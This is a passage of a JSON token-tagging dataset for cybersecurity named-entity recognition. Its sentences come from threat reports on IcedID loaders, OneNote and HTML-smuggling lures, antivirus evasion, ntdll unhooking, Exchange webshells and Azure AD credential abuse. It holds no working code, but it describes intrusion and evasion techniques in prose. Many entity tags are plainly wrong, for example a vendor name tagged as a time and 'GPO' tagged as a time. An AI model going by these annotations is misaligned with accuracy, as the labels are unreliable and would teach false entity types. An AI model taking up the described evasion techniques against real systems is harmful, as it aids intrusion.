"in", - "the", - "UAE", - "was", - "attacked", - "using", - "a", - "malicious", - "Word", - "document" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Area", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "I-SamFile" - ] - }, - { - "tokens": [ - "to", - "gather", - "basic", - "system", - "information." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "rundll32.exe" - ], - "ner_tags": [ - "B-SamFile" - ] - }, - { - "tokens": [ - "spawns", - "it", - "with", - "the", - "rundll32.exe", - "command", - "with", - "the", - "payload", - "URL" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Embedded", - "files", - "of", - "ISO", - "image" - ], - "ner_tags": [ - "B-Features", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "encrypted", - "Dump.bin", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "downloader", - "contains", - "an", - "encrypted", - "configuration", - "at", - "the", - "end", - "of", - "the", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "supplied", - "encrypted", - "decoy", - "document." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "an", - "encrypted", - "decoy", - "document" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "PDF", - "and", - "executable", - "files", - "have", - "numerous", - "spaces", - "before", - "the", - "file", - "extension", - "to", - "hide", - "it", - "and", - "allay", - "suspicions." - ], - "ner_tags": [ - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decodes", - "0x3E8", - "bytes", - "with", - "that", - "key" - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "decrypted", - "data" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "loads", - "the", - "decrypted", - "DLL", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "malware", - "decrypts", - "the", - "configuration", - "data", - "with", - "the", - "RC4", - "algorithm", - "using", - "an", - "embedded", - "64-byte", - "key." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "decrypts", - "the", - "payload", - "with", - "a", - "delivered", - "64-byte", - "RC4", - "key." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "decrypted", - "payload" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "checks", - "for", - "the", - "names", - "of", - "the", - "following", - "antivirus", - "vendors:", - "Sophos,", - "Kaspersky,", - "Avast,", - "Avira,", - "Bitdefender,", - "TrendMicro,", - "and", - "Windows", - "Defender" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Time", - "B-Idus", - "B-Idus", - "B-Idus", - "B-Org", - "O", - "O", - "B-SecTeam" - ] - }, - { - "tokens": [ - "If", - "TrendMicro,", - "BitDefender,", - "or", - "Windows", - "Defender", - "products", - "are", - "installed" - ], - "ner_tags": [ - "O", - "B-Way", - "B-Way", - "O", - "O", - "B-SecTeam", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "If", - "Windows", - "Defender", - "or", - "Bitdefender", - "Antivirus", - "is", - "installed", - "on", - "the", - "victim’s", - "computer" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "depending", - "on", - "the", - "antivirus", - "installed." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "malware", - "can", - "disable", - "the", - "functionalities", - "of", - "EDR/AV", - "products." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "injects", - "the", - "fetched", - "payload", - "into", - "the", - "explorer.exe", - "process" - ], - "ner_tags": [ - "B-Features", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "The", - "Blockchain.pdf", - "file", - "is", - "a", - "malicious", - "HTML", - "application", - "file" - ], - "ner_tags": [ - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool" - ] - }, - { - "tokens": [ - "This", - "evasion", - "technique", - "overwrites", - "the", - ".text", - "section", - "of", - "the", - "pre-loaded", - "ntdll", - "library", - "with", - "the", - "freshly", - "loaded", - "one", - "so", - "that", - "the", - "hooked", - "API", - "addresses", - "are", - "recovered", - "with", - "the", - "original", - "API", - "address" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "campaigns", - "used", - "a", - "variety", - "of", - "email", - "attachments", - "such", - "as", - "Microsoft", - "OneNote", - "attachments", - "and", - "somewhat", - "rare", - "to", - "see", - ".URL", - "attachments," - ], - "ner_tags": [ - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "I-SamFile", - "B-SecTeam", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam" - ] - }, - { - "tokens": [ - "This", - "campaign", - "began", - "with", - "thread", - "hijacked", - "emails", - "which", - "contained", - "HTML", - "attachments." - ], - "ner_tags": [ - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "The", - "HTML", - "attachments", - "used", - "HTML", - "Smuggling", - "to", - "drop", - "a", - "password", - "protected,", - "zipped", - "Windows", - "Script", - "File", - "(WSF)." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "download", - "and", - "execute", - "an", - "intermediate", - "script", - "which", - "then", - "downloaded", - "and", - "executed", - "the", - "Standard", - "IcedID", - "Loader", - "using", - "a", - "non-standard", - "export", - "“init”." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "used", - "to", - "download", - "and", - "execute", - "an", - "IcedID", - "loader." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "opened", - "it", - "would", - "initiate", - "the", - "download", - "of", - "a", - "batch", - "(.bat)", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "The", - "batch", - "file", - "would", - "download", - "and", - "execute" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "When", - "opened,", - "the", - "OneNote", - "document", - "instructed", - "the", - "recipient", - "to", - "\"open\"", - "the", - "document", - "by", - "double-clicking", - "the", - "button", - "displayed", - "in", - "the", - "OneNote", - "document." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "file", - "was", - "concealed", - "beneath", - "the", - "\"open\"", - "text", - "which,", - "if", - "clicked,", - "executed", - "the", - "HTA", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "containing", - "the", - "encrypted", - "bot", - "and", - "DLL", - "loader." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "download", - "of", - "a", - "batch", - "(.bat)", - "file." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "batch", - "file", - "would", - "download", - "and", - "execute" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "that", - "contained", - "various", - "bat", - "files," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "execute", - "an", - "IcedID", - "loader", - "with", - "rundll32" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "loader", - "with", - "rundll32" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Config", - "decryption", - "within", - "IcedID", - "Lite", - "Loader." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Decryption", - "of", - "the", - "URI", - "within" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "domain", - "is", - "decrypted", - "from", - "the", - "configuration", - "and", - "the", - "URI", - "path", - "is", - "decrypted", - "within", - "the", - "function" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decryption", - "is", - "the", - "same", - "across", - "both" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "pattern", - "of", - "decrypting", - "strings" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "Forked", - "Loader", - "decrypts", - "and", - "copies", - "strings", - "into", - "global", - "variables", - "where", - "they", - "will", - "be", - "later", - "used", - "to", - "resolve", - "required", - "functions." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Decryption", - "of", - "the", - "config", - "buffer", - "in", - "the", - "Forked", - "Loader." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "With", - "the", - "config", - "decrypted" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "response", - "gets", - "decrypted", - "with", - "the", - "IcedID", - "decryption", - "routine," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "Contains", - "code", - "to", - "decrypt", - "strings", - "and", - "domains" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "String", - "decryption", - "of", - "the", - "DLL", - "names" - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "With", - "the", - "DLL", - "strings", - "decrypted,", - "the", - "malware", - "then", - "decrypts", - "the", - "loader", - "configuration", - "by", - "taking", - "the", - "first", - "64", - "bytes", - "and", - "XORing", - "it", - "against", - "the", - "next", - "64", - "bytes." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "first", - "four", - "bytes", - "of", - "the", - "decrypted", - "buffer", - "will", - "contain", - "the", - "project", - "identifier" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "This", - "function", - "decrypts", - "strings" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "decrypts", - "the", - "DLL", - "strings", - "to", - "be", - "used", - "later", - "to", - "resolve", - "handles", - "to", - "the", - "DLLs", - "needed" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "strings", - "are", - "decrypted", - "in", - "the", - "same", - "algorithm", - "where", - "the", - "data", - "is", - "split", - "into", - "DWORDs", - "and", - "XOR’d", - "against", - "a", - "random", - "key." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "String", - "decryption", - "for", - "the", - "DLL", - "names", - "needed", - "for", - "execution." - ], - "ner_tags": [ - "I-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decryption", - "of", - "“Lite", - "Loader”\"", - "domains." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "function", - "is", - "called", - "that", - "decrypts", - "strings", - "that" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "there", - "are", - "two", - "domains", - "that", - "are", - "decrypted:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "With", - "the", - "domain", - "names", - "decrypted,", - "the", - "DLL", - "Loader", - "decrypts", - "10", - "strings", - "that", - "should", - "be", - "URIs", - "to", - "be", - "appended", - "to", - "the", - "domains." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decryption", - "of", - "“Lite", - "Loader”", - "filenames." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "the", - "strings", - "are", - "decrypted" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Base64", - "decoding", - "this", - "value" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "following", - "base64", - "decoded", - "header" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "showing", - "the", - "decrypted", - "botpack", - "structure." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "that", - "makes", - "the", - "HTTP", - "request." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "sends", - "an", - "HTTP", - "request", - "that", - "will", - "contain", - "the", - "encrypted", - "bot", - "response." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "contain", - "the", - "host", - "information" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Base-64", - "encoded", - "segment" - ], - "ner_tags": [ - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "may", - "also", - "deliver", - "a", - "weaponized", - "Office", - "document", - "that", - "executes", - "the", - "ReconShark", - "reconnaissance", - "malware." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "distribute", - "password-protected", - "weaponized", - "Office", - "documents" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Office", - "documents", - "weaponized" - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "hardware", - "information." - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "use", - "this", - "tool", - "for", - "remote", - "management", - "of", - "its", - "infrastructure." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "webshells,", - "mostly", - "obfuscated," - ], - "ner_tags": [ - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "hacker", - "also", - "changes", - "the", - "content", - "of", - "the", - "file", - "RedirSuiteServiceProxy.aspx", - "to", - "webshell", - "content." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "RedirSuiteServiceProxy.aspx", - "is", - "a", - "legitimate", - "file", - "name", - "available", - "in", - "the", - "Exchange", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "attacker", - "downloads", - "files," - ], - "ner_tags": [ - "O", - "B-HackOrg", - "O", - "O" - ] - }, - { - "tokens": [ - "drops", - "suspicious", - "files", - "on", - "the", - "attacked", - "servers" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "collecting", - "information", - "on", - "the", - "system," - ], - "ner_tags": [ - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "“cmd”", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "cmd", - "/c" - ], - "ner_tags": [ - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "the", - "standard", - "Windows", - "command", - "line", - "tool", - "cmd.exe." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Delete", - "file", - "or", - "folder" - ], - "ner_tags": [ - "B-SamFile", - "I-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "hacker", - "also", - "injects", - "malicious", - "DLLs", - "into", - "the", - "memory," - ], - "ner_tags": [ - "O", - "B-Idus", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "DLL", - "was", - "injected", - "into", - "the", - "memory", - "of", - "the", - "svchost.exe", - "process" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "executes", - "these", - "files", - "through", - "WMIC." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - ",", - "the", - "above", - "files", - "no", - "longer", - "exist", - "on", - "the", - "compromised", - "system,", - "possibly", - "due", - "to", - "the", - "hacker’s", - "evidence", - "deletion." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Decrypt", - "the", - "request", - "received", - "using", - "AES", - "algorithm" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "After", - "decoding," - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "creates", - "a", - "listener", - "that", - "listens", - "for", - "connections", - "to", - "port", - "443", - "at", - "the", - "path", - "https://*:" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "This", - "method", - "is", - "responsible", - "for", - "collecting", - "system", - "information" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features" - ] - }, - { - "tokens": [ - "Information", - "such", - "as", - "operating", - "system", - "architecture,", - "framework", - "version,", - "operating", - "system", - "version,", - "etc." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "I-Features", - "O", - "I-Features", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "listing", - "directory", - "and", - "file", - "information", - "in", - "the", - "format", - "D|-|<Date", - "created>", - "|<Date", - "modified>", - "|<folder", - "or", - "file", - "name>" - ], - "ner_tags": [ - "O", - "B-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "reading", - "files" - ], - "ner_tags": [ - "O", - "O" - ] - }, - { - "tokens": [ - "Sending", - "and", - "receiving", - "data", - "with", - "C2", - "using", - "the", - "RC4", - "encryption", - "algorithm", - "where", - "the", - "key", - "will", - "be", - "generated", - "at", - "runtime." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "delivered", - "via", - "phishing", - "email", - "as", - "an", - "attachment" - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "archives", - "often", - "include", - "a", - "JavaScript", - "(.js)", - "file" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "likely", - "exploited", - "known", - "vulnerabilities", - "in", - "unpatched", - "applications", - "for", - "initial", - "access" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "gains", - "access", - "to", - "the", - "targets", - "through", - "remote", - "exploitation", - "of", - "an", - "unpatched", - "internet-facing", - "device." - ], - "ner_tags": [ - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "to", - "perform", - "initial", - "intrusion", - "leveraging", - "exposed", - "vulnerable", - "applications,", - "for", - "example,", - "continuing", - "to", - "exploit", - "Log4j", - "2", - "vulnerabilities", - "in", - "unpatched", - "systems", - "in" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-Exp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Installing", - "legitimate", - "remote", - "access", - "tools,", - "such", - "as", - "RPort,", - "Ligolo", - "and", - "eHorus" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "common", - "native", - "Windows", - "tools", - "and", - "commands", - "such", - "as", - "netstat" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windows", - "Management", - "Instrumentation", - "(WMI)", - "to", - "launch", - "commands", - "on", - "devices" - ], - "ner_tags": [ - "O", - "O", - "B-SecTeam", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Remote", - "scheduled", - "tasks", - "to", - "launch", - "their", - "customized", - "PowerShell", - "backdoor" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool" - ] - }, - { - "tokens": [ - "to", - "register", - "a", - "scheduled", - "task", - "used", - "to", - "launch", - "the", - "ransomware", - "payload." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actors", - "consistently", - "perform", - "extensive", - "lateral", - "movement", - "actions", - "using", - "the", - "acquired", - "credentials", - "within", - "a", - "targeted", - "environment." - ], - "ner_tags": [ - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "GPO", - "was", - "leveraged", - "again", - "to", - "register", - "a", - "scheduled", - "task", - "used", - "to", - "launch", - "the", - "ransomware", - "payload." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "first", - "interfered", - "with", - "security", - "tools", - "using", - "Group", - "Policy", - "Objects", - "(GPO)." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "leveraged", - "highly", - "privileged", - "credentials", - "and", - "access", - "to", - "domain", - "controllers" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actors", - "used", - "the", - "compromised", - "administrator", - "account" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "had", - "to", - "first", - "compromise", - "two", - "privileged", - "accounts", - "and", - "leverage", - "them", - "to", - "manipulate", - "the", - "Azure", - "Active", - "Directory", - "(Azure", - "AD)", - "Connect", - "agent." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "first", - "used", - "a", - "compromised,", - "highly", - "privileged", - "account", - "to", - "access", - "the", - "device", - "where", - "the", - "Azure", - "Active", - "Directory", - "(Azure", - "AD)", - "Connect", - "agent", - "is", - "installed." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "first", - "account", - "was", - "the", - "compromised", - "Azure", - "AD", - "Connector", - "account," - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "were", - "observed", - "using", - "compromised", - "credentials", - "to", - "access", - "the", - "Azure", - "AD", - "Connect", - "device." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "authentication", - "from", - "a", - "known", - "attacker", - "IP", - "address", - "into", - "the", - "Azure", - "AD", - "Connector", - "cloud", - "account." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "executed", - "multiple", - "actions", - "in", - "the", - "cloud", - "using", - "two", - "privileged", - "accounts." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "The", - "Azure", - "AD", - "Connector", - "account", - "and", - "the", - "compromised", - "administrator", - "account", - "were", - "then", - "used", - "to", - "perform" - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "a", - "successful", - "sign-in", - "to", - "the", - "Microsoft", - "Azure", - "environment", - "was", - "observed." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "threat", - "actors", - "then", - "used", - "these", - "credentials", - "to", - "pivot", - "from", - "the", - "on-premises", - "environment", - "to", - "the", - "Azure", - "AD", - "environment." - ], - "ner_tags": [ - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "leveraged", - "RDP", - "for", - "access", - "into", - "the", - "account." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "the", - "threat", - "actors", - "accessed", - "it", - "through", - "RDP,", - "which", - "is", - "an", - "open", - "session", - "that", - "evades", - "MFA", - "blocking", - "their", - "activities." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": 